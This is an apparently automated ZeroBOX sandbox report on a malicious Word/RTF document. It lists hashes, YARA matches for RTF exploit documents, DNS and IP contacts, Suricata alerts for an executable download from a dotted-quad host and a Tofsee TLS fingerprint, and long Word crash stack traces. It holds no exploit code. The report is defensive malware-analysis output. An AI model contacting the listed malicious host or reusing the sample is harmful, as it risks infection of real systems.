Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	Sept. 30, 2023, 1:23 p.m.	Sept. 30, 2023, 1:29 p.m.

Size	29.5KB
Type	ISO-8859 text, with very long lines, with CRLF, CR, LF line terminators
MD5	`750637aa4adce8ce221b8d8755dbbaf8`
SHA256	`2e850540fca520336d35447b1592d9d4ee27b139c83ffec3b12bc6d31fdc4f2f`
CRC32	`16C3918E`
ssdeep	`384:dEhzWuGu5+nEEKFBe4FGa27Y6QJI8dvDhQfCecbYryaUHuEz:w6pEEKFQoYY6MIOSfTKHaoz`
Yara	SUSP_INDICATOR_RTF_MalVer_Objects - Detects RTF documents with non-standard version and embedding one of the object mostly observed in exploit (e.g. CVE-2017-11882) documents. Rich_Text_Format_Zero - Rich Text Format Signature Zero MS_RTF_Suspicious_documents - Suspicious documents using RTF document OLE object

WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Office15\WINWORD.EXE" C:\Users\test22\AppData\Local\Temp\IOI0ioio0OIOIO0IOI0ioi0i0000000%23%23%23%23%23%23%23%23%23%23%23%23%23%23000000000000000000%23%23%23%23%23%23%23%23%23%23%23%23%23%2300000000.doc
1836

Name	Response	Post-Analysis Lookup
www.google.com		142.250.76.132
clients2.googleusercontent.com	A 142.251.220.1 CNAME googlehosted.l.googleusercontent.com	172.217.161.225
edgedl.me.gvt1.com	A 34.104.35.123	34.104.35.123
r1---sn-3u-bh2ss.gvt1.com	A 211.114.64.12 CNAME r1.sn-3u-bh2ss.gvt1.com	211.114.64.12
clientservices.googleapis.com		142.250.206.195
clients2.googleusercontent.com	CNAME googlehosted.l.googleusercontent.com	172.217.161.225
accounts.google.com		172.217.25.173
apis.google.com	A 142.250.204.110 CNAME plus.l.google.com	172.217.161.238
www.google.com	A 142.250.66.132 A 216.58.200.228	142.250.76.132
_googlecast._tcp.local
dns.google	A 8.8.8.8 A 8.8.4.4	8.8.4.4
dns.google		8.8.4.4
clientservices.googleapis.com	A 142.250.204.67	142.250.206.195
www.gstatic.com		142.250.206.227
apis.google.com	CNAME plus.l.google.com	172.217.161.238
accounts.google.com	A 142.250.204.109	172.217.25.173
www.gstatic.com	A 142.251.220.3	142.250.206.227
r1---sn-3u-bh2ss.gvt1.com	CNAME r1.sn-3u-bh2ss.gvt1.com	211.114.64.12

IP Address	Status	Action
142.250.204.109	Active	Moloch
142.250.204.110	Active	Moloch
142.250.204.67	Active	Moloch
142.250.206.238	Active	Moloch
142.250.66.132	Active	Moloch
142.250.66.67	Active	Moloch
142.250.76.131	Active	Moloch
142.251.220.1	Active	Moloch
142.251.220.3	Active	Moloch
142.251.222.195	Active	Moloch
164.124.101.2	Active	Moloch
172.217.161.225	Active	Moloch
172.217.161.234	Active	Moloch
172.217.25.170	Active	Moloch
172.217.25.174	Active	Moloch
192.3.108.47	Active	Moloch
211.114.64.12	Active	Moloch
216.58.200.228	Active	Moloch
34.104.35.123	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.103:49162 -> 192.3.108.47:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.3.108.47:80 -> 192.168.56.103:49162	2022050	ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1	A Network Trojan was detected
TCP 192.3.108.47:80 -> 192.168.56.103:49162	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 192.3.108.47:80 -> 192.168.56.103:49162	2022051	ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2	A Network Trojan was detected
TCP 192.3.108.47:80 -> 192.168.56.103:49162	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.103:49168 -> 142.250.66.67:443	906200022	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 34.104.35.123:80 -> 192.168.56.103:49172	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 34.104.35.123:80 -> 192.168.56.103:49172	2014520	ET INFO EXE - Served Attached HTTP	Misc activity
TCP 192.168.56.103:49167 -> 142.250.66.67:443	906200022	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49199 -> 8.8.8.8:443	2047866	ET INFO Observed Google DNS over HTTPS Domain (dns .google in TLS SNI)	Misc activity
TCP 192.168.56.103:49195 -> 142.250.66.67:443	906200022	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLS 1.2 192.168.56.103:49168 142.250.66.67:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=upload.video.google.com	be:40:3a:a6:de:cc:a7:8b:75:43:68:f2:f9:56:63:71:49:61:06:49
TLS 1.2 192.168.56.103:49167 142.250.66.67:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=upload.video.google.com	be:40:3a:a6:de:cc:a7:8b:75:43:68:f2:f9:56:63:71:49:61:06:49
TLS 1.3 192.168.56.103:49184 142.250.204.67:443	None	None	None
TLS 1.3 192.168.56.103:49183 142.250.66.132:443	None	None	None
TLS 1.3 192.168.56.103:49187 172.217.25.14:443	None	None	None
TLS 1.3 192.168.56.103:49186 142.251.222.195:443	None	None	None
TLS 1.3 192.168.56.103:49188 216.58.200.228:443	None	None	None
TLS 1.3 192.168.56.103:49189 211.114.64.12:443	None	None	None
TLS 1.3 192.168.56.103:49192 142.251.220.3:443	None	None	None
TLS 1.3 192.168.56.103:49199 8.8.8.8:443	None	None	None
TLS 1.3 192.168.56.103:49197 8.8.8.8:443	None	None	None
TLS 1.3 192.168.56.103:49200 172.217.25.170:443	None	None	None
TLS 1.3 192.168.56.103:49201 172.217.25.170:443	None	None	None
TLS 1.3 192.168.56.103:49194 142.250.204.110:443	None	None	None
TLS 1.3 192.168.56.103:49202 142.250.206.238:443	None	None	None
TLS 1.2 192.168.56.103:49195 142.250.66.67:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=upload.video.google.com	be:40:3a:a6:de:cc:a7:8b:75:43:68:f2:f9:56:63:71:49:61:06:49
TLS 1.3 192.168.56.103:49203 172.217.25.174:443	None	None	None
TLS 1.3 192.168.56.103:49206 142.250.76.131:443	None	None	None
TLS 1.3 192.168.56.103:49185 142.250.204.109:443	None	None	None
TLS 1.3 192.168.56.103:49196 142.251.220.1:443	None	None	None
TLS 1.3 192.168.56.103:49198 8.8.8.8:443	None	None	None
TLS 1.3 192.168.56.103:49204 172.217.161.234:443	None	None	None
UNDETERMINED 192.168.56.103:49191 142.251.220.3:443	None	None	None
UNDETERMINED 192.168.56.103:49190 142.251.220.3:443	None	None	None

One or more processes crashed (2 events)

Time & API	Arguments	Status	Return	Repeated
__exception__ Sept. 30, 2023, 1:24 p.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x754c374b DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x75c6f725 NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x754d414b WdtpInterfacePointer_UserUnmarshal+0x166b DllDebugObjectRPCHook-0x2d8d ole32+0x13c8e2 @ 0x75c6c8e2 CoRegisterMessageFilter+0x32b4 ObjectStublessClient5-0x1db5 ole32+0x398ad @ 0x75b698ad OleCreateEmbeddingHelper+0x2a1 CreateFileMoniker-0x17de ole32+0x81414 @ 0x75bb1414 ObjectStublessClient31+0x6af8 STGMEDIUM_UserUnmarshal-0x22bb6 ole32+0x97b68 @ 0x75bc7b68 wdGetApplicationObject+0xedd89 DllCanUnloadNow-0x21a514 wwlib+0xd9c510 @ 0x72e8c510 DllGetLCID+0x458c18 ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0xf2578 wwlib+0x6aaf0e @ 0x7279af0e DllGetLCID+0x45446a ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0xf6d26 wwlib+0x6a6760 @ 0x72796760 DllGetLCID+0x43ff23 ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x10b26d wwlib+0x692219 @ 0x72782219 DllGetLCID+0x43e5c5 ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x10cbcb wwlib+0x6908bb @ 0x727808bb DllGetLCID+0x43bf9f ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x10f1f1 wwlib+0x68e295 @ 0x7277e295 DllGetLCID+0x43b4fa ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x10fc96 wwlib+0x68d7f0 @ 0x7277d7f0 DllGetClassObject+0x233e1a DllGetLCID-0x19879 wwlib+0x238a7d @ 0x72328a7d DllGetClassObject+0x2fc15 DllGetLCID-0x21da7e wwlib+0x34878 @ 0x72124878 DllGetLCID+0xa2634 ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x4a8b5c wwlib+0x2f492a @ 0x723e492a DllGetLCID+0x94522 ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x4b6c6e wwlib+0x2e6818 @ 0x723d6818 ?OSFCreateOfficeExtensionsDialogUser@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z+0xfb02f wdCommandDispatch-0x10ee45 wwlib+0x898677 @ 0x72988677 DllGetLCID+0x326892 ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x2248fe wwlib+0x578b88 @ 0x72668b88 DllGetLCID+0x17706f ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x3d4121 wwlib+0x3c9365 @ 0x724b9365 DllGetClassObject+0x2e77 DllGetLCID-0x24a81c wwlib+0x7ada @ 0x720f7ada FMain+0x253 DllGetClassObject-0x260 wwlib+0x4a03 @ 0x720f4a03 wdCommandDispatch-0x370 winword+0x15c4 @ 0xe715c4 wdCommandDispatch-0x3dc winword+0x1558 @ 0xe71558 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x800706be exception.offset: 46887 exception.address: 0x7559b727 registers.esp: 1622000 registers.edi: 1974991376 registers.eax: 1622000 registers.ebp: 1622080 registers.edx: 0 registers.ebx: 75475404 registers.esi: 2147944126 registers.ecx: 2846981211	1	0	0
__exception__ Sept. 30, 2023, 1:24 p.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x754c374b DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x75c6f725 NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x754d414b WdtpInterfacePointer_UserUnmarshal+0x166b DllDebugObjectRPCHook-0x2d8d ole32+0x13c8e2 @ 0x75c6c8e2 CoRegisterMessageFilter+0x32b4 ObjectStublessClient5-0x1db5 ole32+0x398ad @ 0x75b698ad CoRegisterMessageFilter+0x5048 ObjectStublessClient5-0x21 ole32+0x3b641 @ 0x75b6b641 CoRegisterMessageFilter+0x4ff4 ObjectStublessClient5-0x75 ole32+0x3b5ed @ 0x75b6b5ed CoRegisterMessageFilter+0x4b79 ObjectStublessClient5-0x4f0 ole32+0x3b172 @ 0x75b6b172 CoRegisterMessageFilter+0x4075 ObjectStublessClient5-0xff4 ole32+0x3a66e @ 0x75b6a66e ObjectStublessClient31+0x2961c STGMEDIUM_UserUnmarshal-0x92 ole32+0xba68c @ 0x75bea68c ObjectStublessClient31+0x6776 STGMEDIUM_UserUnmarshal-0x22f38 ole32+0x977e6 @ 0x75bc77e6 OleCreateEmbeddingHelper+0x344 CreateFileMoniker-0x173b ole32+0x814b7 @ 0x75bb14b7 ObjectStublessClient31+0x6af8 STGMEDIUM_UserUnmarshal-0x22bb6 ole32+0x97b68 @ 0x75bc7b68 wdGetApplicationObject+0xedd89 DllCanUnloadNow-0x21a514 wwlib+0xd9c510 @ 0x72e8c510 DllGetLCID+0x458c18 ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0xf2578 wwlib+0x6aaf0e @ 0x7279af0e DllGetLCID+0x45446a ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0xf6d26 wwlib+0x6a6760 @ 0x72796760 DllGetLCID+0x43ff23 ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x10b26d wwlib+0x692219 @ 0x72782219 DllGetLCID+0x43e5c5 ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x10cbcb wwlib+0x6908bb @ 0x727808bb DllGetLCID+0x43bf9f ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x10f1f1 wwlib+0x68e295 @ 0x7277e295 DllGetLCID+0x43b4fa ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x10fc96 wwlib+0x68d7f0 @ 0x7277d7f0 DllGetClassObject+0x233e1a DllGetLCID-0x19879 wwlib+0x238a7d @ 0x72328a7d DllGetClassObject+0x2fc15 DllGetLCID-0x21da7e wwlib+0x34878 @ 0x72124878 DllGetLCID+0xa2634 ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x4a8b5c wwlib+0x2f492a @ 0x723e492a DllGetLCID+0x94522 ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x4b6c6e wwlib+0x2e6818 @ 0x723d6818 ?OSFCreateOfficeExtensionsDialogUser@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z+0xfb02f wdCommandDispatch-0x10ee45 wwlib+0x898677 @ 0x72988677 DllGetLCID+0x326892 ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x2248fe wwlib+0x578b88 @ 0x72668b88 DllGetLCID+0x17706f ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x3d4121 wwlib+0x3c9365 @ 0x724b9365 DllGetClassObject+0x2e77 DllGetLCID-0x24a81c wwlib+0x7ada @ 0x720f7ada FMain+0x253 DllGetClassObject-0x260 wwlib+0x4a03 @ 0x720f4a03 wdCommandDispatch-0x370 winword+0x15c4 @ 0xe715c4 wdCommandDispatch-0x3dc winword+0x1558 @ 0xe71558 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x800706ba exception.offset: 46887 exception.address: 0x7559b727 registers.esp: 1621692 registers.edi: 1974991376 registers.eax: 1621692 registers.ebp: 1621772 registers.edx: 0 registers.ebx: 75529548 registers.esi: 2147944122 registers.ecx: 2846981211	1	0	0

Time & API

Arguments

Status

Return

Repeated

__exception__

Sept. 30, 2023, 1:24 p.m.

stacktrace:

RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x754c374b
DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x75c6f725
NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x754d414b
WdtpInterfacePointer_UserUnmarshal+0x166b DllDebugObjectRPCHook-0x2d8d ole32+0x13c8e2 @ 0x75c6c8e2
CoRegisterMessageFilter+0x32b4 ObjectStublessClient5-0x1db5 ole32+0x398ad @ 0x75b698ad
OleCreateEmbeddingHelper+0x2a1 CreateFileMoniker-0x17de ole32+0x81414 @ 0x75bb1414
ObjectStublessClient31+0x6af8 STGMEDIUM_UserUnmarshal-0x22bb6 ole32+0x97b68 @ 0x75bc7b68
wdGetApplicationObject+0xedd89 DllCanUnloadNow-0x21a514 wwlib+0xd9c510 @ 0x72e8c510
DllGetLCID+0x458c18 ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0xf2578 wwlib+0x6aaf0e @ 0x7279af0e
DllGetLCID+0x45446a ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0xf6d26 wwlib+0x6a6760 @ 0x72796760
DllGetLCID+0x43ff23 ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x10b26d wwlib+0x692219 @ 0x72782219
DllGetLCID+0x43e5c5 ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x10cbcb wwlib+0x6908bb @ 0x727808bb
DllGetLCID+0x43bf9f ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x10f1f1 wwlib+0x68e295 @ 0x7277e295
DllGetLCID+0x43b4fa ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x10fc96 wwlib+0x68d7f0 @ 0x7277d7f0
DllGetClassObject+0x233e1a DllGetLCID-0x19879 wwlib+0x238a7d @ 0x72328a7d
DllGetClassObject+0x2fc15 DllGetLCID-0x21da7e wwlib+0x34878 @ 0x72124878
DllGetLCID+0xa2634 ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x4a8b5c wwlib+0x2f492a @ 0x723e492a
DllGetLCID+0x94522 ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x4b6c6e wwlib+0x2e6818 @ 0x723d6818
?OSFCreateOfficeExtensionsDialogUser@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z+0xfb02f wdCommandDispatch-0x10ee45 wwlib+0x898677 @ 0x72988677
DllGetLCID+0x326892 ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x2248fe wwlib+0x578b88 @ 0x72668b88
DllGetLCID+0x17706f ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x3d4121 wwlib+0x3c9365 @ 0x724b9365
DllGetClassObject+0x2e77 DllGetLCID-0x24a81c wwlib+0x7ada @ 0x720f7ada
FMain+0x253 DllGetClassObject-0x260 wwlib+0x4a03 @ 0x720f4a03
wdCommandDispatch-0x370 winword+0x15c4 @ 0xe715c4
wdCommandDispatch-0x3dc winword+0x1558 @ 0xe71558
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0x800706be
exception.offset: 46887
exception.address: 0x7559b727
registers.esp: 1622000
registers.edi: 1974991376
registers.eax: 1622000
registers.ebp: 1622080
registers.edx: 0
registers.ebx: 75475404
registers.esi: 2147944126
registers.ecx: 2846981211

__exception__

Sept. 30, 2023, 1:24 p.m.

stacktrace:

RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x754c374b
DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x75c6f725
NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x754d414b
WdtpInterfacePointer_UserUnmarshal+0x166b DllDebugObjectRPCHook-0x2d8d ole32+0x13c8e2 @ 0x75c6c8e2
CoRegisterMessageFilter+0x32b4 ObjectStublessClient5-0x1db5 ole32+0x398ad @ 0x75b698ad
CoRegisterMessageFilter+0x5048 ObjectStublessClient5-0x21 ole32+0x3b641 @ 0x75b6b641
CoRegisterMessageFilter+0x4ff4 ObjectStublessClient5-0x75 ole32+0x3b5ed @ 0x75b6b5ed
CoRegisterMessageFilter+0x4b79 ObjectStublessClient5-0x4f0 ole32+0x3b172 @ 0x75b6b172
CoRegisterMessageFilter+0x4075 ObjectStublessClient5-0xff4 ole32+0x3a66e @ 0x75b6a66e
ObjectStublessClient31+0x2961c STGMEDIUM_UserUnmarshal-0x92 ole32+0xba68c @ 0x75bea68c
ObjectStublessClient31+0x6776 STGMEDIUM_UserUnmarshal-0x22f38 ole32+0x977e6 @ 0x75bc77e6
OleCreateEmbeddingHelper+0x344 CreateFileMoniker-0x173b ole32+0x814b7 @ 0x75bb14b7
ObjectStublessClient31+0x6af8 STGMEDIUM_UserUnmarshal-0x22bb6 ole32+0x97b68 @ 0x75bc7b68
wdGetApplicationObject+0xedd89 DllCanUnloadNow-0x21a514 wwlib+0xd9c510 @ 0x72e8c510
DllGetLCID+0x458c18 ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0xf2578 wwlib+0x6aaf0e @ 0x7279af0e
DllGetLCID+0x45446a ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0xf6d26 wwlib+0x6a6760 @ 0x72796760
DllGetLCID+0x43ff23 ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x10b26d wwlib+0x692219 @ 0x72782219
DllGetLCID+0x43e5c5 ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x10cbcb wwlib+0x6908bb @ 0x727808bb
DllGetLCID+0x43bf9f ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x10f1f1 wwlib+0x68e295 @ 0x7277e295
DllGetLCID+0x43b4fa ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x10fc96 wwlib+0x68d7f0 @ 0x7277d7f0
DllGetClassObject+0x233e1a DllGetLCID-0x19879 wwlib+0x238a7d @ 0x72328a7d
DllGetClassObject+0x2fc15 DllGetLCID-0x21da7e wwlib+0x34878 @ 0x72124878
DllGetLCID+0xa2634 ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x4a8b5c wwlib+0x2f492a @ 0x723e492a
DllGetLCID+0x94522 ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x4b6c6e wwlib+0x2e6818 @ 0x723d6818
?OSFCreateOfficeExtensionsDialogUser@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z+0xfb02f wdCommandDispatch-0x10ee45 wwlib+0x898677 @ 0x72988677
DllGetLCID+0x326892 ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x2248fe wwlib+0x578b88 @ 0x72668b88
DllGetLCID+0x17706f ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x3d4121 wwlib+0x3c9365 @ 0x724b9365
DllGetClassObject+0x2e77 DllGetLCID-0x24a81c wwlib+0x7ada @ 0x720f7ada
FMain+0x253 DllGetClassObject-0x260 wwlib+0x4a03 @ 0x720f4a03
wdCommandDispatch-0x370 winword+0x15c4 @ 0xe715c4
wdCommandDispatch-0x3dc winword+0x1558 @ 0xe71558
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca
